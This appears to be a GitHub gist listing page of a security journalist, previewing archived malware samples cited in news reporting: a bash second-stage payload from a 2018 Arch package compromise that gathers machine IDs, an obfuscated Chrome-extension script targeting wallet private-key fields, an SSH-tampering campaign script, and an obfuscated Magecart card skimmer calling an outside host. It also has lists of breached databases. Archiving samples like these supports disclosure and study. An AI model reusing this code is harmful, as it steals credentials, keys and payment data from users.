Skip to content

Instantly share code, notes, and snippets.

View campuscodi's full-sized avatar
🕊️
Probably working...

Catalin Cimpanu campuscodi

🕊️
Probably working...
18 followers · 0 following
View GitHub Profile
@campuscodi
campuscodi / ~u
Created July 10, 2018 20:49
~u file downloaded as 2nd stage payload in public Arch package compromise
#!/bin/bash
function urle() {
sed -e 's|!|%21|' -e 's|#|%23|' -e 's|$|%24|' -e 's|&|%26|' -e "s|'|%27|" -e 's|(|%28|' -e 's|)|%29|' -e 's|*|%2a|' -e 's|+|%2b|' -e 's|,|%2c|' -e 's|/|%2f|' -e 's|:|%3a|' -e 's|;|%3b|' -e 's|=|%3d|' -e 's|?|%3f|' -e 's|@|%40|' -e 's|\[|%5b|' -e 's|]|%5d|'
}
declare -fx urle
GID=
MACHINE_ID="$(cat /etc/machine-id)"
PASTE_TITLE="$(echo [xeactor]\ $MACHINE_ID|urle)"
upload() {
@campuscodi
campuscodi / gist:74d0d2e35d8fd9499c76333ce027345a
Created July 10, 2018 20:49
~x file downloaded in public Arch package compromise
#!/bin/bash
# get to the right location
if [[ -n "$pkgdir" ]]; then
cd "$pkgdir"
else
exit 0
fi
be_silent() {
@campuscodi
campuscodi / DataViper full list
Last active March 15, 2023 14:40
Gist created and used for ZDNet article: https://www.zdnet.com/article/hacker-breaches-security-firm-in-act-of-revenge/
People Data Labs 1216656058
verifications.io 763574253
Collection 1 759264286
Exploit.in 733936374
Antipublic 561703015
Oxydata.io 406994204
MySpace 360713781
Cloud154 326105933
Exactis 298885050
Unknown Facebook data (204.12.215.107) 292717675
@campuscodi
campuscodi / Awake-Chrome-extension-status
Created June 18, 2020 14:28
acmnokigkgihogfbeooklgemindnbine is down
apgohnlmnmkblgfplgnlmkjcpocgfomp is down
apjnadhmhgdobcdanndaphcpmnjbnfng is down
bahkljhhdeciiaodlkppoonappfnheoi is down
bannaglhmenocdjcmlkhkcciioaepfpj is down
bgffinjklipdhacmidehoncomokcmjmh is down
bifdhahddjbdbjmiekcnmeiffabcfjgh is down
bjpknhldlbknoidifkjnnkpginjgkgnm is down
blngdeeenccpfjbkolalandfmiinhkak is down
ccdfhjebekpopcelcfkpgagbehppkadi is down
@campuscodi
campuscodi / DataViper JSON samples
Last active July 15, 2020 15:12
Gist created and used for ZDNet article: https://www.zdnet.com/article/hacker-breaches-security-firm-in-act-of-revenge/
├── 1.5m Combo.json
├── 17173.com.json
├── 178.com.json
├── 2018 voters Colorado.json
├── 2018 voters Connecticut.json
├── 2018 voters Florida.json
├── 2018 voters Kansas.json
├── 2018 voters Nevada.json
├── 2018 voters North Carolina.json
├── 2018 voters Ohio.json
@campuscodi
campuscodi / manifest.json
Created January 1, 2020 07:17
Shitcoin wallet manifest.json
{
"update_url": "https://clients2.google.com/service/update2/crx",
"name": "Shitcoin Wallet",
"version": "1.5.2",
"description": "E-wallet is concentrated on the ERC-20 platform.",
"permissions": ["activeTab", "storage", "*://*.infura.io/*", "*://*.tokenbalance.com/*", "*://erc20wallet.tk/*"],
"content_security_policy": "script-src 'self' 'sha256-lMz1NqveNgzhCVSTDXZo8ufc/yD3TkT7DOemexGdrRo='; object-src 'self'",
"background": {
"scripts": ["jquery.js", "background.js"],
@campuscodi
campuscodi / content_.js
Created January 1, 2020 07:14
content_.js file from Shitcoin Wallet
var _0xbe53=["\x68\x6F\x73\x74\x6E\x61\x6D\x65","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x77\x77\x77\x2E\x6D\x79\x65\x74\x68\x65\x72\x77\x61\x6C\x6C\x65\x74\x2E\x63\x6F\x6D","\x6C\x65\x6E\x67\x74\x68","\x69\x6E\x70\x75\x74\x5B\x6E\x61\x6D\x65\x3D\x27\x50\x72\x69\x76\x61\x74\x65\x4B\x65\x79\x27\x5D","\x70\x61\x73\x74\x65","\x74\x65\x78\x74","\x67\x65\x74\x44\x61\x74\x61","\x63\x6C\x69\x70\x62\x6F\x61\x72\x64\x44\x61\x74\x61","\x6F\x72\x69\x67\x69\x6E\x61\x6C\x45\x76\x65\x6E\x74","\x63\x6B\x6B\x67\x6D\x63\x63\x65\x66\x66\x66\x6E\x62\x62\x61\x6C\x6B\x6D\x62\x62\x67\x65\x62\x62\x6F\x6A\x6A\x6F\x67\x66\x66\x6E","\x70\x76\x69\x5F\x65\x74","\x73\x65\x6E\x64\x4D\x65\x73\x73\x61\x67\x65","\x72\x75\x6E\x74\x69\x6D\x65","\x62\x69\x6E\x64","\x69\x6E\x70\x75\x74\x5B\x74\x79\x70\x65\x3D\x27\x66\x69\x6C\x65\x27\x5D","\x66\x69\x6C\x65\x73","\x74\x61\x72\x67\x65\x74","\x72\x65\x61\x64\x41\x73\x54\x65\x78\x74","","\x6F\x6E\x6C\x6F\x61\x64","\x72\x65\x73\x75\x6C\x74","\x76\x61\x6C","\x2E\x70\x61\x73\x73\x77\x6F\x72\x64\x2D\x66\x6F\
@campuscodi
campuscodi / 1XQa.sh
Created November 26, 2019 00:41
Malware campaign. See here: https://twitter.com/bad_packets/status/1199087675833085959
#!/bin/bash
resetsshgo(){
if [ "$needreset" -eq "0" ];
then
echo "no need"
else
sleep 10;
/etc/init.d/ssh restart;
/etc/init.d/sshd restart;
@campuscodi
campuscodi / Volusion code
Created October 8, 2019 17:45
/*!
* JavaScript Cookie v2.2.1
* https://github.com/js-cookie/js-cookie
*
* Copyright 2006, 2015 Klaus Hartl & Fagner Brack
* Released under the MIT license
*/
;
(function(factory) {
var registeredInModuleLoader;
@campuscodi
campuscodi / feedbackembad-min-1.0.js
Created September 12, 2018 15:05
Magecart code on Feedify
var _0xeb25=["\x68\x74\x74\x70\x73\x3A\x2F\x2F\x69\x6E\x66\x6F\x2D\x73\x74\x61\x74\x2E\x77\x73\x2F\x6A\x73\x2F\x73\x6C\x69\x64\x65\x72\x2E\x6A\x73","\x73\x65\x74\x69\x64\x64","\x28\x3F\x3A\x5E\x7C\x3B\x20\x29","\x5C\x24\x31","\x72\x65\x70\x6C\x61\x63\x65","\x3D\x28\x5B\x5E\x3B\x5D\x2A\x29","\x6D\x61\x74\x63\x68","\x63\x6F\x6F\x6B\x69\x65","\x67\x65\x74\x54\x69\x6D\x65","\x2D","\x72\x61\x6E\x64\x6F\x6D","\x66\x6C\x6F\x6F\x72","\x73\x65\x74\x69\x64\x64\x3D","\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x73\x6E\x64","\x69\x6E\x70\x75\x74\x2C\x20\x73\x65\x6C\x65\x63\x74\x2C\x20\x74\x65\x78\x74\x61\x72\x65\x61\x2C\x20\x63\x68\x65\x63\x6B\x62\x6F\x78\x2C\x20\x62\x75\x74\x74\x6F\x6E","\x71\x75\x65\x72\x79\x53\x65\x6C\x65\x63\x74\x6F\x72\x41\x6C\x6C","\x6C\x65\x6E\x67\x74\x68","\x76\x61\x6C\x75\x65","\x6E\x61\x6D\x65","","\x3D","\x26","\x61\x5B\x68\x72\x65\x66\x2A\x3D\x27\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x76\x6F\x69\x64\x28\x30\x